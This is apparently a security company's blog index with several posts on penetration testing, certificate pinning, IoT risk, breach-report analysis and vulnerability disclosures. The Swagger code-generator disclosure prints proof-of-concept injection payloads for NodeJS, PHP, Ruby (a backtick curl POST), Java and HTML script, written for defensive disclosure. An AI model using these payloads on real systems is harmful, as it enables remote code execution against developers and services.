Skip navigation
All Places > Information Security > Blog
1 2 3 Previous Next

Information Security

653 posts

In a fight between pirates and ninjas, who would win? I know what you are thinking. “What in the world does this have to do with security?” Read on to find out but first, make a choice: Pirates or Ninjas?


Before making that choice, we must know what the strengths and weaknesses are for each:








Brute-Force Attack

Drunk (Some say this could be a strength too)

Great at Plundering

Can be Careless

Long-Range Combat







No Armor



Dedicated to Training


Hand-to-Hand/Sword Combat





It comes down to which is more useful in different situations. If you are looking for treasure that is buried on an island and may run into the Queen's Navy, you probably do not want ninjas. If you are trying to assassinate someone, then pirates are probably not the right choice.


The same is true when it comes to Penetration Testing and Red Team Assessments. Both have strengths and weaknesses and are more suited to specific circumstances. To get the most value, first determine what your goals are, then decide which best corresponds with those goals.


Penetration Testing


Penetration testing is usually rolled into one big umbrella with all security assessments. A lot of people do not understand the differences between a Penetration Test, a Vulnerability Assessment, and a Red Team Assessment, so they call them all Penetration Testing. However, this is a misconception. While they may have similar components, each one is different and should be used in different contexts.


At its core, real Penetration Testing is testing to find as many vulnerabilities and configuration issues as possible in the time allotted, and exploiting those vulnerabilities to determine the risk of the vulnerability. This does not necessarily mean uncovering new vulnerabilities (zero days), it's more often looking for known, unpatched vulnerabilities. Just like Vulnerability Assessments, Penetration Testing is designed to find vulnerabilities and assess to ensure they are not false positives. However, Penetration Testing goes further, as the tester attempts to exploit a vulnerability. This can be done numerous ways and, once a vulnerability is exploited, a good tester will not stop. They will continue to find and exploit other vulnerabilities, chaining attacks together, to reach their goal. Each organization is different, so this goal may change, but usually includes access to Personally Identifiable Information (PII), Protected Health Information (PHI), and trade secrets. Sometimes this requires Domain Administrator access; often it does not or Domain Administrator is not enough.


Who needs a penetration test? Some governing authorities require it, such as SOX and HIPAA, but organizations already performing regular security audits internally, and implementing security training and monitoring, are likely ready for a penetration test.


Red Team Assessment


A Red Team Assessment is similar to a penetration test in many ways but is more targeted. The goal of the Red Team Assessment is NOT to find as many vulnerabilities as possible. The goal is to test the organization’s detection and response capabilities. The red team will try to get in and access sensitive information in any way possible, as quietly as possible. The Red Team Assessment emulates a malicious actor targeting attacks and looking to avoid detection, similar to an Advanced Persistent Threat (APT). (Ugh! I said it…) Red Team Assessments are also normally longer in duration than Penetration Tests. A Penetration Test often takes place over 1-2 weeks, whereas a Red Team Assessment could be over 3-4 weeks or longer, and often consists of multiple people.


A Red Team Assessment does not look for multiple vulnerabilities but for those vulnerabilities that will achieve their goals. The goals are often the same as the Penetration Test. Methods used during a Red Team Assessment include Social Engineering (Physical and Electronic), Wireless, External, and more. A Red Team Assessment is NOT for everyone though and should be performed by organizations with mature security programs. These are organizations that often have penetration tests done, have patched most vulnerabilities, and have generally positive penetration test results.


The Red Team Assessment might consist of the following:


A member of the Red Team poses as a Fed-Ex delivery driver and accesses the building. Once inside, the Team member plants a device on the network for easy remote access. This device tunnels out using a common port allowed outbound, such as port 80, 443, or 53 (HTTP, HTTPS, or DNS), and establishes a command and control (C2) channel to the Red Team’s servers. Another Team member picks up the C2 channel and pivots around the network, possibly using insecure printers or other devices that will take the sights off the device placed. The Team members then pivot around the network until they reach their goal, taking their time to avoid detection.


This is just one of innumerable methods a Red Team may operate but is a good example of some tests we have performed.




So... Pirates or Ninjas?


Back to pirates vs. ninjas. If you guessed that Penetration Testers are pirates and Red Teams are ninjas, you are correct. Is one better than the other? Often Penetration Testers and Red Teams are the same people, using different methods and techniques for different assessments. The true answer in Penetration Test vs. Red Team is just like pirates vs. ninjas; one is not necessarily better than the other. Each is useful in certain situations. You would not want to use pirates to perform stealth operations and you would not want to use ninjas to sail the seas looking for treasure. Similarly, you would not want to use a Penetration Test to judge how well your incident response is and you would not want to perform a Red Team assessment to discover vulnerabilities.

This disclosure will address a class of vulnerabilities in a Swagger Code Generator in which injectable parameters in a Swagger JSON or YAML file facilitate remote code execution. This vulnerability applies to NodeJS, PHP, Ruby, and Java and probably other languages as well.  Other code generation tools may also be vulnerable to parameter injection and could be affected by this approach. By leveraging this vulnerability, an attacker can inject arbitrary execution code embedded with a client or server generated automatically to interact with the definition of service.  This is considered an abuse of trust in definition of service, and could be an interesting space for further research.


According to - “Swagger is a simple yet powerful representation of your RESTful API. With the largest ecosystem of API tooling on the planet, thousands of developers are supporting Swagger in almost every modern programming language and deployment environment. With a Swagger-enabled API, you get interactive documentation, client SDK generation, and discoverability.


Within the Swagger ecosystem, there are fantastic code generators which are designed to automagically take a Swagger document and then generate stub client code for the described API. This is a powerful part of the solution that makes it easy for companies to provide developers the ability to quickly make use of their APIs. The Swagger definitions are flexible enough to describe most RESTful API’s and give developers a great starting point for their API client. The problems discussed here is that several of these code generators do not take into account the possibility of a malicious Swagger definition document which results in a classic parameter injection, with a new twist on code generation.


Maliciously crafted Swagger documents can be used to dynamically create HTTP API clients and servers with embedded arbitrary code execution in the underlying operating system. This is achieved by the fact that some parsers/generators trust insufficiently sanitized parameters within a Swagger document to generate a client code base.

  • On the client side, a vulnerability exists in trusting a malicious Swagger document to create any generated code base locally, most often in the form of a dynamically generated API client.
  • On the server side, a vulnerability exists in a service that consumes Swagger to dynamically generate and serve API clients, server mocks and testing specs.

Client Side

swagger-codegen contains a template-driven engine to generate client code in different languages by parsing a Swagger Resource Declaration. It is packaged or referenced in several open source and public services provided by such as,, and Other commercial products include (restlet-studio) and These services appear to generate and store these artifacts (but not execute) and are able to be publicly downloaded and consumed. Remote code execution is achieved when the download artifact is executed on the target.

Server Side

Online services exist that consume Swagger documents and automatically generate and execute server-side application, test specs, and mock servers provide a potential for remote code execution. Some identified commercial platforms that follow this model include:,,,, and


These issues were discovered by Scott Davis of Rapid7, Inc., and reported in accordance with Rapid7's disclosure policy.


Please see the associated Metasploit exploit module for examples for the following languages.


Swagger-codegen generates client and server code based on a Swagger document in which it trusts to specify inline variables in code unescaped (i.e. unescaped handlebars template variables). The javascript, html, php, ruby and java clients were tested for parameter injection vulnerabilities, and given in example as follows.

javascript (node)

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable NodeJS.

"paths": {        
     "/a');};};return exports;}));console.log('RCE');(function(){}(this,function(){a=function(){b=function(){new Array('": {



Strings within the 'description' object of a Swagger document can be written with html 'script' tags, and loaded unescaped into a browser.

"info": {        
     "description": "<script>alert(1)</script>",



Strings within the 'description' object in the definitions section of a Swagger document can inject comments and inline php code.

"definitions": {        
     "d": {            
          "type": "object",            
          "description": "*/ echo system(chr(0x6c).chr(0x73)); /*",



Strings in 'description' and 'title' of a Swagger document can be used in unison to terminate block comments, and inject inline ruby code.

"info": {        
     "description": "=begin",
     "title": "=end `curl -X POST -d \"fizz=buzz\"`"


Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable Java.

"paths": {        
     "/a\"; try{java.lang.Runtime.getRuntime().exec(\"ls\");}catch(Exception e){} \"": 



Until code generators are patched by their maintainers, users are advised to carefully inspect Swagger documents for language-specific escape sequences.


Fixes need to be implemented by those creating code generation tools, in general this does not apply to the swagger documents themselves. Mitigations for all issues include properly escaping parameters before injecting, while taking into account the context the variable(s) are used in inline code creation, and what sanitization efforts are in place to ensure the context of trust for an API specification can maintain a level of code creation free for remote code execution in the known, easily avoidable cases.


For example, using double brackets {{, instead of {{{ for handlebars templates will usually prevent many types of injection attacks that involve single or double quote termination, however this will not stop a determined attacker who can inject variables without sanitization logic into multi-line comments, inline code or variables.


Mustache templates

  • {{{ code }}} or {{& code}} can be vulnerable in template and sanitization logic
  • {{ code }} can be vulnerable given context language of template (e.g. block quote)

Where to be wary

  • inline code creation from variable
  • single ticks (') and quotes (") unescaped variable injection
  • block comment (initiator & terminator) injection

Where it gets tricky

  • Arbitrary Set delimiter redefinition {{=< >=}} <={{ }}=>
  • Runtime Partial templates {{> partial}}
  • set redefinition with alternate unescape {{=< >=}} <&foo> <={{ }}=>

What to do in general

  • prefer escaped variables always {{foo}}
  • enforce single-line for commented variables // {{foo}}
  • sanitize ' & " in variables before unescaped insertion
  • encode ', in single quoted path strings.
  • encode ", in double quoted path strings


It is recommended to consider usage of a sanitization tool such as the OWASP ESAPI.

For the time being, a Github Pull Request is offered here.

Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Tue, Apr 19, 2016: Attempted to contact the vendor and the API team at
  • Mon, May 09, 2016: Details disclosed to CERT (VU#755216).
  • Thu, Jun 16, 2016: Proposed patch supplied to CERT.
  • Wed, Jun 23, 2016: CVE-2016-5641 assigned by CERT.
  • Thu, Jun 23, 2016: Public disclosure and Metasploit module released.
  • Thu, Jun 23, 2016: Fix offered to swagger-codegen.


Future of Swagger

Starting January 1st, 2016, the Swagger Specification has been donated to the Open API Initiative (OAI) and is the foundation of the OpenAPI Specification.  However, the name ‘Swagger’ is still the preferred naming in many a dinner party and dad joke, and was used in this document when referring to an OAS 2.0 specification documentation.  In the typical case, a Swagger document defines a RESTful API.  It implements a subset of the JSON Schema Draft 4.

Tomorrow, Adobe is expected to release a patch for CVE-2016-4171, which fixes a critical vulnerability in Flash that Kaspersky reports is being used in active, targeted campaigns. Generally speaking, these sorts of pre-patch, zero day exploits don't see a lot of widespread use; they're too valuable to burn on random acts of hacking.


So, customers shouldn't be any more worried about their Flash installation base today than they were yesterday. However, as I explained almost a year ago, Flash remains a very popular vector for client side attacks, so we recommend you always treat it with caution, and disable it when not needed. This announcement is a great reminder to do that.


Since Flash's rise as a popular vector for exploitation, many organizations have taken defensive steps to ensure that Flash has the same click-to-play protections as Java in their desktop space, so those enterprises are in a better position to defend against this and the next Adobe Flash exploit.


Our products teams here at Rapid7 are alert to this news, and will be working up solutions in Nexpose and Metasploit to cover this vulnerability, and this blog will be updated when those checks and modules are available. For Nexpose customers in particular, if you’ve opted into Nexpose Now, you can easily create dashboard cards to see all of your java vulnerabilities and the impact that this vulnerability has on your risk. You can also use Adaptive Security to set up a trigger for the vulnerability so that Nexpose automatically launches a scan for it as soon as the check is released.

Today, I'm happy to announce the latest research paper from Rapid7, National Exposure Index: Inferring Internet Security Posture by Country through Port Scanning, by Bob Rudis, Jon Hart, and me, Tod Beardsley. This research takes a look at one of the most foundational components of the internet: the millions and millions of individual services that live on the public IP network. thumbnail_National Exposure Index_cover.jpg


When people think about "the internet," they tend to think only of the one or two protocols that the World Wide Web runs on, HTTP and HTTPS. Of course, there are loads of other services, but which are actually in use, and at what rate? How much telnet, SSH, FTP, SMTP, or any of the other protocols that run on TCP/IP is actually in use today, where are they all located, and how much of it is inherently insecure due to running over non-encrypted, cleartext channels?


While projects like CAIDA and Shodan perform ongoing telemetry that covers important aspects of the internet, we here at Rapid7 are unaware of any ongoing effort to gauge the general deployment of services on public networks. So, we built our own, using Project Sonar, and we have the tooling now to not only answer these fundamental questions about the nature of the internet and come up with more precise questions for specific lines of inquiry.


Can you name the top ten TCP protocols offered on the internet? You probably can guess the top two, but did you know that #7 is telnet? Yep, there are 15 million good old, reliable, usually unencrypted telnet out there, offering shells to anyone who cares to peek in on the cleartext password as it's being used.


We found some weird things on the national level, too. For instance, about 75% of the servers offering SMB/CIFS services - a (usually) Microsoft service for file sharing and remote administration for Windows machines -  reside in just six countries: the United States, China, Hong Kong, Belgium, Australia and Poland.


It's facts like these that made us realize that we have a fundamental gap in our awareness of the services deployed on the public side of firewalls the world over. This gap, in turn, makes it hard to truly understand what the internet is. So, the paper and the associated data we collected (and will continue to collect) can help us all get an understanding of what makes up one of the most significant technologies in use on Planet Earth.

So, you can score a copy of the paper, full of exciting graphs (and absolutely zero pie charts!) here. Or, if you're of a mind to dig into the data behind those graphs, you can score the summary data here and let us know what is lurking in there that you found surprising, shocking, or sobering.

Situations come up relatively frequently where a specific certificate authority, trusted by browsers and operating systems, acts in a way that the users of those products would consider untrustworthy.


In the enterprise, with services exposed to the Internet and employees traveling, working from Wi-Fi and other insecure connections, this is also a very important issue, as the use of some of these less than tasteful certificates could lead to data (and credential!) interception.


Fortunately, if you manage Windows systems, you can not only configure the list of trusted authorities, but you can also pin the appropriate one for each service you use.


Untrusting Certificate Authorities on Windows via GPO


Filippo Valsorda, from Cloudflare, discovered and disclosed that Symantec had created an intermediate certificate authority (CA) for Blue Coat, a company that provides network devices with the ability to inspect SSL/TLS.


While there are legitimate uses to these features in the enterprise, such a CA could allow anyone using it to intercept encrypted traffic. This is not the first time, and will probably not be the last time something like this happens, so being ready to revoke certificate authorities is an ability enterprises must have.


Filippo also posted a great tutorial on how to revoke it on OS X and now links to Windows instructions but this article also covers pinning and goes into a bit more detail.


In this post, we will look at doing it on Windows, in an Active Directory environment.


Whitelist Versus Blacklist


Windows does allow you to fully configure certificate authorities, which would be ideal from a security perspective, to keep full control of the approved authorities, but which would result in a whitelist approach, requiring additional management effort as it involves replacing the certificates on all systems via GPO, which could risk breaking custom certificates installed for legitimate purposes. This should be a longer term goal, but a blacklist approach can still be used right away.


In this case, start by downloading the certificate you want to block as a .crt file.


Create A Group Policy Object (GPO)


You could use an existing GPO, or create a new one. The important thing to consider is that this will be a computer policy, that should be linked to the OUs where your workstations are located. As with any GPO changes, it is highly recommended to first link and filter this policy to specific testing workstations, considering a mistake could end up breaking SSL/TLS connectivity on workstations.




Edit the GPO, and under Computer Configuration/Windows Settings/Security Settings/Public Key Policies/Untrusted Certificates, right click in the right pane to get the Import option.




The first wizard screen has greyed out options, as we are modifying a GPO. On the second one, simply browse to the CRT you downloaded. Ensure the imported certificate gets placed in Untrusted Certificates.


At this point, your GPO should look like this, and is ready to block this certificate from the Windows store on all machines where it is deployed.




Pinning Certificate Authorities Via GPO


Revoking known bad certificates is one thing, but a very reliable way to ensure bad certificates have no impact on corporate services is to pin those. Pinning essentially configures the client device to only accept known good values for pre-configured SSL/TLS communications.


Pinning can be done very granularly, at the certificate/public key level, which would require a lot of management, but it can also be done at the certificate authority level, which is much easier to manage.


This would allow us to configure systems to only expect, for example, that communications to the Rapid7 website should use GoDaddy certificates.




By applying this to the services used by traveling employees, you can ensure that captive portals, hotel and plane Wi-Fi environments or even malicious attacks at the ISP levels would require forging a certificate of that very specific authority, and would prevent the use of another illegitimate yet trusted certificate.


Deploy EMET


Deployment of EMET has already been covered in our whiteboard Wednesdays briefly, and Microsoft includes great information about it with the installer. EMET must be deployed to the workstations where you wish to pin certificates, and while other EMET mitigations are great for security, they are not covered in this post, where we will focus only on certificate management.


Create A GPO For EMET


Again, a policy that applies to the appropriate computer objects must be created.


EMET itself comes with the appropriate files to create GPOs, located under Program Files\EMET\Deployment\Group Policy Files.


1. Copy the ADMX to <SystemDrive>\Windows\PolicyDefinitions

2. Copy the ADML to  <SystemDrive>\Windows\PolicyDefinitions\en-US folder

3. Re-open the GPO Management Console

4. You now have a new set of GPO options available under Computer Configuration\Administrative Template\Windows Components\EMET

5. Enable Certificate Pinning Configuration.

6. In Pinned Sites, list all URLs you want to protect, as well as the name of the rule we will create.

7. In Pinning Rules, use the same rule name, then list the thumbprints (SHA-1) of the certificates to accept, or of their authorities. These rules can get very granular, include expiration dates and more - please read the examples provided by Microsoft if you would like to use such advanced rules. Using the EMET GUI, when starting, can allow you to see the types of rules that can be created with more ease than editing those relatively unfriendly GPOs.

8. In our example, I configure to only trusted a SHA-1 thumbprint of OBVIOUSLYNOTAREALTHUMBPRINT. We configured this to be a blocking rule, that expires on Christmas 2020.




9. If you run the EMET GUI on a system where the GPO is applied, you'll see the new rule being applied, denoted by the icon showing it is coming from a GPO.



10. If we now browse to Rapid7's website, we get a certificate warning, since the real certificate does not match the fake thumbprint. This is what would happen if a trusted but illegitimate certificate was at play in a man-in-the-middle-attack.




11. EMET logs an error to the Event Log, which you should absolutely detect and investigate.




12. Repeat this for all important services you use, such as webmail, single sign-on portals, reverse proxies, SaaS providers. Additional protection for social network accounts can also be achieved this way.


Warning: Edge does not seem to support this feature yet. You should also look into configuring any alternate browsers in use with similar rules, to obtain better coverage. Again, this is the type of change that should be tested very well before being pushed to a significant amount of workstations, but once done, you will have significantly reduced the chances of a man-in-the-middle attack, and augmented the odds of detecting them.


Enjoy your new GPOs!

Suchin Gururangan and I (I'm pretty much there for looks, which is an indicator that jenellis might need prescription lenses) will be speaking at SOURCE Boston this week talking about "doing data science" at "internet scale" and also on how you can get started doing security data science at home or in your organization.  So, come on over to learn more about the unique challenges associated with analyzing "security data", the evolution of IPv4 autonomous systems, where your adversaries may be squirreled away and to find out what information lies hidden in this seemingly innocuous square:



This blog post was written by Bob Rudis, Chief Security Data Scientist and Deral Heiland, Research Lead.


Organizations have been participating in the “Internet of Things” (IoT) for years, long before marketers put this new three-letter acronym together. HVAC monitoring/control, badge access, video surveillance systems and more all have had IP connectivity for ages. Today, more systems, processes and (for lack of a more precise word) gizmos are being connected to enterprise networks that fit into this IoT category. Some deliberately; some not.




As organizations continue down the path of adoption of IoT solutions into their environments they are faced with a number of hard questions, and in some ways they may not always know what those questions are. In an attempt to help them avoid falling into a potentially deep and hazardous IoT pit, we’ve put together a few key questions that may help adopters better embrace and secure IoT technology within their organizations.


  1. What’s already there?
  2. Do we really need this? (i.e. making the business case for IoT)
  3. How does it connect and communicate (both internally and externally)?
  4. How is it accessed and controlled? (i.e. is there an “app for that” and who has access)
  5. What is the classification of the data? ( i.e. data handled and processed by IoT)
  6. Can we monitor and maintain these IoT devices?
  7. What are the failure modes? (i.e. what breaks if it breaks?)
  8. How does it fit in our threat models? (i.e. what is the impact if compromised?)


What’s already there?

This should be the first question. If you can’t answer it right now, you need to work with your teams to inventory what’s out there. By default, these devices are on your network, so you should be able to use your network scanner to find and inventory them. Work with your vendor to ensure they have support for identifying IoT devices.


Short of that, work with your procurement teams to see what products have been purchased that may have an IoT component. You should be able to do this by vendor or device name (you may need to look on the itemized purchase orders). Put out a call to action to your department peers to see what they may have deployed without your knowing that may not have shown on the books. Building/campus maintenance and security, app development, and system/app/network architecture departments are good places to start.


Do we really need this?

Let’s face it, these “things” are pretty cool and many of them are highly useful. It’s much more efficient being able to deploy cameras or control environmental systems within a building or campus by using modern network protocols and spiffy apps. But, do you really need internet-enabled lights, televisions, and desktop assistants? Yeah, we’re looking at you, Alexa. The novelty effect of IoT should make “why” the first question you ask when considering investing in new “things," quickly followed by “what value does this bring to our organization”. If the answers do not meet the standards your organization has identified, then you should probably curb your IoT enthusiasm for a bit or consider deploying the technology in an isolated environment, with strong access controls to limit or prevent connectivity to the organizations internal systems.


There are good business cases for IoT: increased efficiency, cost reduction, service/feature enhancements and more. You may even be in a situation where the “cool factor” is needed to attract new employees or customers. Only you know what meets the threshold of “need."


How does it connect and communicate?

There are many aspects to the concept of “communication” in IoT. Does it connect to the LAN, Wi-Fi network and/or 3G/4G for access/control? Does it employ ZigBee, Bluetooth or other low-power and/or mesh network features for distributed or direct communications? Does it use encryption for all, some or any communications? Can it work behind an authenticated proxy server or does it require a direct internet connection? What protocols does it use for communication?


Most of these are standard questions on any new technology adoption within an organization. One issue with communications and IoT devices is that their makers tend to not have enterprise deployments in mind and the vast majority require direct internet connections, communicate without encryption and use new, low-power communication technologies to transmit data and control commands in clear text.


An advertised feature of many IoT devices is that they store your data in “the cloud." Every question you currently ask about cloud deployments in your organization apply to IoT devices. The cloud connection and internal connection effectively make these “things” a custom data router from your network to some other network. Once you enable that connection, there’s almost nothing stopping it from going the other way. Be wary of sacrificing control for “cool."


To get answers to these questions, don’t just trust the manufacturer. Hold your own Proof of Concept deployment in controlled environments and monitor all communications as you change settings. Your regulatory requirements or just internal policy requirements may make the use of many IoT devices impossible without filing an exception and accepting the risks associated with the deployment.


How is it accessed and controlled?

IoT is often advertised as a plug-and-play technology. This means the builders tried to remove as much friction as possible from deployments to drive up adoption. This focus on ease-of-use is aimed at casual consumers but many IoT devices have no “enterprise” counterpart. That is, you deploy the same exact devices in the same exact way both “at home” and “at work”. This means many devices will have no password or use only a simple static password versus more detailed or elaborate controls that you are used to in an enterprise. The vast majority have no concept of or support for two-factor or multi-factor authentication. If you think access control is weak, most have no concept of encryption when it comes to any communication channel. If the built-in controls do not conform with your standard requirements consider isolating the “management” side within a separate network - if that’s possible.


IoT device access is often done through a mobile app or web (internet) console. How are these mechanisms secured? How is the authentication and/or data secured in transit and on disk? Again, all the cloud service questions you already ask are valid here and you should be wary of relaxing standards without significant benefits.


What is the classification of the data?

Another key action to perform when deciding on implementing an IoT solution is to examine the data that is gathered and stored by these devices. By reviewing the data and properly classifying it within defined categories, we can better approach how the data gathered, transmitted, and stored within our environment. This will also help us make better informed decisions when we are faced with IoT technologies that store data in the cloud, or ones that also transmit voice and video information to the cloud. Data classification policy and procedures are important to all businesses to assure that all data is being properly handled within the organization. If you do not have such a practice it is highly recommended that one is developed and that IoT data is included in those policy and procedures.


The Department of Energy—in conjunction with Sandia National Labs—has put together a guide to developing a Security Framework for Control System Data Classification and Protection[1] that can help you get started when applying data classification strategies to your own Internet of Things.


Can we monitor and maintain these IoT devices?

Unlike servers, routers, switches and firewalls, IoT makers tend to sacrifice manageability for the ability to pack in cool features. The idea of monitoring is a notice when a device fails to phone home or fails to upload data in a preset time interval. Expecting to use SNMP or an ssh connection to gain management telemetry should not be an assumption you make lightly. Verify and test management options before committing to a solution.


Patch management is also a critical concern when dealing with IoT technology. In this case we have to consider the full ecosystem of the IoT solution deployed, which could include the control hardware firmware, sensor hardware firmware, server software, and associated mobile application software. Ensuring that all segments are included in a comprehensive patch management solution can be difficult. Based on the IoT technology deployed, there may not be vendor automation patching available. If this is the case then a self-managed solution will need to be implemented.


What are the failure modes?

Often overlooked when considering the deployment of any technology but specially with IoT, what happens if the technology fails to operate correctly? Can the business proceed without these services when failure leads to security breakdown or loss of critical data? If so, then it is important that we identify methods to mitigate or reduce the impact of these failures, which may include introducing needed redundancies.


If you have no current process in place to analyze failure modes, a great place to start is by using a cyber-oriented failure

mode and effect analysis (FMEA) framework[2] or something like Open FAIR[3] (factor analysis of information risk). Both enable you to quantify outcomes of scenarios and helps combat the urge to “make a gut call” on when considering the possible negative outcomes from IoT deployments.


How does it fit within our threat models?

This question needs to be asked in tandem with the failure modes investigation. No system or device sits in isolation on your network, and attackers use the interconnectedness of systems to move laterally and find points of exposure to work from. You should be threat modeling your proposed IoT deployments the same way you do everything else. Look at where it lives, what lives around it and what it does (including the data it transmits and what else it connects to, especially externally). Map out this graph to make sure it fits in within the parameters of your current threat models and expand them only if you absolutely have to.


The Internet of Things holds much promise, profit, and progress but with that comes real risk and tangible exposure. We should not be afraid to embrace this technology, but should do so in the safest and most secure ways possible. We hope these questions help you better risk assess IoT you already have and will be adopting.


[1] Security Framework for Control System Data Classification and Protection: k_for_Data_Class.pdf

[2] Christoph Schmittner, Thomas Gruber, Peter Puschner, and Erwin Schoitsch. 2014. Security Application of Failure Mode and Effect Analysis (FMEA). In Proceedings of the 33rd International Conference on Computer Safety, Reliability, and Security - Volume 8666 (SAFECOMP 2014), Andrea Bondavalli and Felicita Di Giandomenico (Eds.), Vol. 8666. Springer-Verlag New York, Inc., New York, NY, USA, 310-325. DOI=

[3] The OpenFAIR body of knowledge:

ImageMagick Vulnerabilities and Exploits


On Tuesday, the ImageMagick project posted a vulnerability disclosure notification on their official project forum regarding a vulnerability present in some of its coders. The post details a mitigation strategy that seems effective, based on creating a more restricted policy.xml that governs resource usage by ImageMagick components.


Essentially, the ImageMagick vulnerabilities are a combination of a type of confusion vulnerability (where the ImageMagick components do not correctly identify a file format) and a command injection vulnerability (where the filtering mechanisms for guarding against shell escapes are insufficient).


How worried should I be?


The reason for the public disclosure in the first place is due to the vulnerabilities being exploited already by unknown actors, as reported by Ryan Huber. As predicted by him, published exploits by security researchers targeting the affected components are emerging in short order, including a Metasploit module authored by William Vu and HD Moore.


As reported by Dan Goodin, ImageMagick components are common in several web application frameworks, so the threat is fairly serious for any web site operator that is using one of those affected technologies. Since ImageMagick is a component used in several stacks, patches are not universally available yet.


What's next?


Website operators should immediately determine their use of ImageMagick components in image processing, and implement the referenced policy.xml mitigation while awaiting an updated package that fixes the identified vulnerabilities. Restricting file formats accepted by ImageMagick to just the few that are actually needed, such as PNG, JPG, and GIF, is always a good strategy for those sites where it makes sense to do so. ImageMagick parses hundreds of file formats, which is part of its usefulness.


Are any Rapid7 products affected?

No Rapid7 products are affected by this vulnerability.

Verizon has released the 2016 edition of their annual Data Breach Investigations Report (DBIR). Their crack team of researchers have, once again, produced one of the most respected, data-driven reports in cyber security, sifting through submissions from 67 contributors and taking a deep dive into 64,000+ incidents—and nearly 2,300 breaches—to help provide insight on what our adversaries are up to and how successful they've been.


The DBIR is a highly anticipated research project and has valuable information for many groups. Policy makers use it to defend legislation; pundits and media use it to crank out scary articles; other researchers and academics take the insights in the report and identify new avenues to explore; and vendors quickly identify product and services areas that are aligned with the major findings. Yet, the data in the report is of paramount import to defenders. With over 80 pages to wade through, we thought it might be helpful to provide some way-points that you could use to navigate through this year's breach and incident map.


Bigger is…Better?


There are a couple "gotchas" with data submitted to the DBIR team. The first is that a big chunk of data comes from the U.S. public sector where there are mandatory reporting laws, regulations, and requirements. The second is the YUGE number of Unknowns. The DBIR acknowledges this, and it's still valuable to look at the data when there are "knowns" even with this grey (okay, ours is green below) blob of uncertainty in the mix. You can easily find your industry in DBIR Tables 1 & 2 (pages 3 & 4) and if we pivot on that data we can see the distribution of the percentage of incidents that are breaches:



We've removed the "Public (92)" industry from this set to get a better sense of what's happening across general industries. For the DBIR, there were more submissions of incidents with confirmed data disclosure for smaller organizations than large (i.e. be careful out there SMBs), but there's also a big pile of Unknowns:



We can also take another, discrete view of this by industry:




(Of note: it seems even the Verizon Data Breach Report has "Unknown Unknowns")


As defenders, you should be reading the report with an eye for your industry, size, and other characteristics to help build up your threat profiles and help benchmark your security program. Take your incident to breach ratio (you are using VERIS to record and track everything from anti-virus hits to full on breaches, right?) and compare it to the corresponding industry/size.


The Single Most Popular Valuable Chart In The World! (for defenders)


When it comes right down to it, you're usually fighting an economic battle with your adversaries. This year's report, Figure 3 (page 7) shows that the motivations are still primarily financial and that Hacking, Malware and Social are the weapons of choice for attackers. We'll dive into that in a bit, but we need to introduce our take on DBIR Figure 8 (page 10) before continuing:



We smoothed out the rough edges from the 2016 Verizon Data Breach Report to figure to paint a somewhat clearer picture of the overall trends, and used a complex statistical transformation (i.e. subtraction) to just focus on the smoothed gap:




Remember, the DBIR data is a biased sample from the overall population of cyber security incidents and breaches that occur and every statistical transformation introduces more uncertainty along the way. That means your takeaway from "Part Deux" should be "we're not getting any better" vs "THE DETECTION DEFICIT TOPPED 75% FOR THE FIRST TIME IN HISTORY!"


So, our adversaries are accomplishing their goals in days or less at an ever-quickening success rate while defenders are just not keeping up at all. Before we can understand what we need to do to reverse these trends, we need to see what the attackers are doing. We took the data from DBIR Figure 6 (page 9) and pulled out the top threat actions for each year, then filtered the result to the areas that match both the major threat action categories and the areas of concern that Rapid7 customers have a keen focus on:


2016-verizon-data-breach-report-fig-6-1.pngSome key takeaways:

  • Malware and hacking events dropping C2s are up
  • Key loggers are making a comeback (this may be an artifact of the heavy influence of Dridex in the DBIR data set this year)
  • Malware-based exfiltration is back to previously seen levels
  • Phishing is pretty much holding steady, which is most likely supporting the use of compromised credentials (which is trending up)


Endpoint monitoring, kicking up your awareness programs, and watching out for wonky user account behavior would be wise things to prioritize based on this data.


Not all Cut-and-Dridex

The Verizon Data Breach Report mentions Dridex 13 times and was very up front about the bias it introduced in the report. So, how can you interpret the data with "DrideRx" prescription lenses? Rapid7's Analytic Response Team notes that Dridex campaigns involve:


  • Phishing
  • Endpoint malware drops
  • Establishment of command and control (C2) on the endpoint
  • Harvesting credentials and shipping them back to the C2 servers


This means that—at a minimum—the data behind the Data Breach Investigations Report, Figures 6-8 & 15-22, impacted the overall findings and Verizon itself warns about broad interpretations of the Web App Attacks category:


"Hundreds of breaches involving social attacks on customers, followed by the Dridex malware and subsequent use of credentials captured by keyloggers, dominate the actions."


So, when interpreting the results, keep an eye out for the above components and factor in the Dridex component before tweaking your security program too much in one direction or another.


Who has your back?


When reading any report, one should always check to make sure the data presented doesn't conflict with itself. One way to add a validation to the above detection deficit is to look at DBIR Figure 9 (page 11) which shows (when known) how breaches were discovered over time. We can simplify this view as well:


2016-verizon-data-breach-report-fig-7-1.pngIn the significant majority of cases, defenders have law enforcement agencies (like the FBI in the United States) and other external parties to "thank" for letting them know they've been pwnd. As our figure shows, we stopped being able to watch our own backs half a decade ago and have yet to recover. This should be a wake-up call to defenders to focus on identifying how attackers are getting into their organizations and instrumenting better ways to detect their actions.


Are you:


  • Identifying critical assets and access points?
  • Monitoring the right things (or anything) on your endpoints?
  • Getting the right logs into the right places for analysis and action?
  • Deploying honeypots to catch activity that should not be happening?


If not, these may be things you need to re-prioritize in order to force the attackers to invest more time and resources to accomplish their goals (remember, this is an battle of economics).


Are You Feeling Vulnerable?


Attackers are continuing to use stolen credentials at an alarming rate and they obtain these credentials through both social engineering and the exploitation of vulnerabilities. Similarly, lateral movement within an organization also relies—in part—on exploiting vulnerabilities. DBIR Figure 13 (page 16) shows that as a group, defenders are staying on top of current and year-minus-one vulnerabilities fairly well:



We're still having issues patching or mitigating older vulnerabilities, many of which have tried-and-true exploits that will work juuuust fine. Leaving these attack points exposed is not helping your economic battle with your adversaries, as letting them rely on past R&D means they have more time and opportunity. How can you get the upper-hand?


  • Maintain situational awareness when it comes to vulnerabilities (i.e. scan with a plan)
  • Develop a strategy patching with a holistic focus, not just react to "Patch Tuesday"
  • Don't dismiss mitigation. There are legitimate technical and logistic reasons that can make patching difficult. Work on developing a playbook of mitigation strategies you can rely on when these types of vulnerabilities arise.


